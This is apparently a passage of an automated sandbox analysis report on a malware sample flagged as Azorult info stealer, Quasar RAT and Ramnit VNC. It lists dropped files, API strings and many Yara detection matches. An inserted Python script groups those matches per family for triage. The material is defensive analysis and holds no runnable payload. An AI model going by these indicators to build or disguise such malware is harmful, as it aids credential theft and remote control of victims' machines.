Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program 
ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgr\version.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
                      Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmpBinary or memory string: SetProgmanWindow
                      Source: C:\Windows\System32\svchost.exeCode function: GetWindowRect,GetWindowRect,GetWindowRect,RedrawWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetLocaleInfoW,CharUpperBuffW,memcpy,RedrawWindow,5_2_00C83460
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeCode function: GetLocaleInfoA,7_2_00404BA8
                      Source: C:\Users\user\AppData\Local\Temp\windef.exeQueries volume information: C:\Users\user\AppData\Local\Temp\windef.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\windef.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\windef.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\windef.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\windef.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\windef.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\vnc.exeCode function: 4_2_00ACEA96 cpuid 4_2_00ACEA96
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeCode function: 1_2_00DD520A GetSystemTimeAsFileTime,__aulldiv,1_2_00DD520A
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeCode function: 7_2_004065F0 GetUserNameW,7_2_004065F0
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeCode function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00DB49A0

                      Stealing of Sensitive Information:

                      Yara detected Azorult Info Stealer
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Yara detected Quasar RAT
                      Source: Yara matchFile source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara matchFile source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
                      Source: Yara matchFile source: dropped/windef.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Yara detected Azorult
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Detected AZORult Info Stealer
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exeCode function: 7_2_004186C47_2_004186C4
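                      The Yara lists above give one line per dump in which a family rule fired, which makes it slow to answer the triage questions that matter: which processes host which family, whether a hit sat in executable memory (live code rather than a buffer of strings), and whether one process hosts several families, as the loader here does. The script below is an added example, not part of the Joe Sandbox report, that folds a subset of these lines (copied verbatim from the Azorult, Quasar and Ramnit lists in this section) into one summary per family. The meaning of the `.unpack` and `.sdmp` name fields (process index, stage, base address, page protection) is an assumption read off the report's own naming, not a documented format; the pairing of the decimal index in `.unpack` names with the hex index in `.sdmp` names rests on the report itself listing `SystemPropertiesPerformance.exe` beside `0000000A` and `10.x` dumps.

```python
"""Fold a sandbox report's 'Yara detected ...' match lines into one summary per
family.  Added example, not code from the report.  Assumed name layout (read off
the report's own naming): <pidx>.<stage>.<proc>.<base hex>.<n>[.raw].unpack and
<pidx hex>.<stage>.<id>.<base>.<page protection>.<region type>.sdmp, with the
same process index in both forms (10 == 0000000A) and Win32 PAGE_* protections.
"""
import re
from dataclasses import dataclass, field

# Constructed input: a subset of the match lines copied from the report above.
REPORT_LINES = r"""
Yara detected Azorult Info Stealer
Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Yara detected Quasar RAT
Source: Yara matchFile source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara matchFile source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Yara detected Ramnit VNC Module
Source: Yara matchFile source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
"""

# winnt.h: PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

HEADING_RE = re.compile(r"^Yara detected (?P<family>.+?)(?:Show sources)?$")  # tolerate glued widget text
MATCH_RE = re.compile(r"^Source: Yara match\s*File source: (?P<src>.+), type: (?P<kind>[A-Z]+)$")
UNPACK_RE = re.compile(r"^(?P<pidx>\d+)\.\d+\.(?P<proc>.+?)\.(?P<base>[0-9a-fA-F]+)\.\d+\.(?:raw\.)?unpack$")
SDMP_RE = re.compile(r"^(?P<pidx>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})"
                     r"\.(?P<prot>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$")
MEMSTR_RE = re.compile(r"^Process Memory Space: (?P<proc>.+) PID: (?P<pid>\d+)$")

@dataclass
class FamilySummary:
    family: str
    sample_matched: bool = False
    processes: dict = field(default_factory=dict)     # process index -> name, None if only seen as .sdmp
    os_pids: dict = field(default_factory=dict)       # process name -> {OS PID} from MEMORYSTR lines
    dropped: list = field(default_factory=list)       # dropped files the rule hit on disk
    exec_regions: list = field(default_factory=list)  # (process index, base, protection) for RX/RWX hits

def parse_report(text):
    """Return {family: FamilySummary} for every 'Yara detected ...' list in text."""
    summaries, names, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        h = HEADING_RE.match(line)
        if h:
            current = summaries.setdefault(h["family"], FamilySummary(h["family"]))
            continue
        m = MATCH_RE.match(line)
        if not m or current is None:
            continue
        src, kind = m["src"], m["kind"]
        if kind == "SAMPLE":
            current.sample_matched = True
        elif kind == "DROPPED":
            current.dropped.append(src)
        elif kind == "UNPACKEDPE" and (u := UNPACK_RE.match(src)):
            pidx = int(u["pidx"])
            names[pidx] = current.processes[pidx] = u["proc"]
        elif kind == "MEMORY" and (d := SDMP_RE.match(src)):
            pidx, prot = int(d["pidx"], 16), int(d["prot"], 16)
            current.processes.setdefault(pidx, None)
            if prot & PAGE_EXECUTE_MASK:  # rule fired in executable memory: unpacked code, not a string buffer
                current.exec_regions.append((pidx, int(d["base"], 16), prot))
        elif kind == "MEMORYSTR" and (s := MEMSTR_RE.match(src)):
            current.os_pids.setdefault(s["proc"], set()).add(int(s["pid"]))
    for summary in summaries.values():  # back-fill names for indices only seen as raw dumps
        for pidx in summary.processes:
            if summary.processes[pidx] is None and pidx in names:
                summary.processes[pidx] = names[pidx]
    return summaries

def shared_hosts(summaries):
    """Process indices whose memory matched more than one family -> sorted family names."""
    by_pidx = {}
    for fam, s in summaries.items():
        for pidx in s.processes:
            by_pidx.setdefault(pidx, set()).add(fam)
    return {p: sorted(f) for p, f in by_pidx.items() if len(f) > 1}

if __name__ == "__main__":
    result = parse_report(REPORT_LINES)
    for fam, s in result.items():
        hosts = ", ".join(f"{p}={s.processes[p] or '?'}" for p in sorted(s.processes))
        print(f"{fam}: sample={s.sample_matched} hosts=[{hosts}] "
              f"exec_hits={len(s.exec_regions)} dropped={len(s.dropped)} os_pids={s.os_pids}")
    print("shared hosts:", shared_hosts(result))
```

                      On the subset embedded above the script reports process index 10 (SystemPropertiesPerformance.exe) as hosting both Azorult and Quasar and index 7 (CVbJSUXraQ.exe) as hosting Azorult and Ramnit, which is the expected picture for a loader that carries several payloads; the RX/RWX hits at 0x14D0000 and 0x401000 are the dumps worth pulling for static analysis first.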
                      Yara detected Ramnit VNC Module
                      Source: Yara matchFile source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
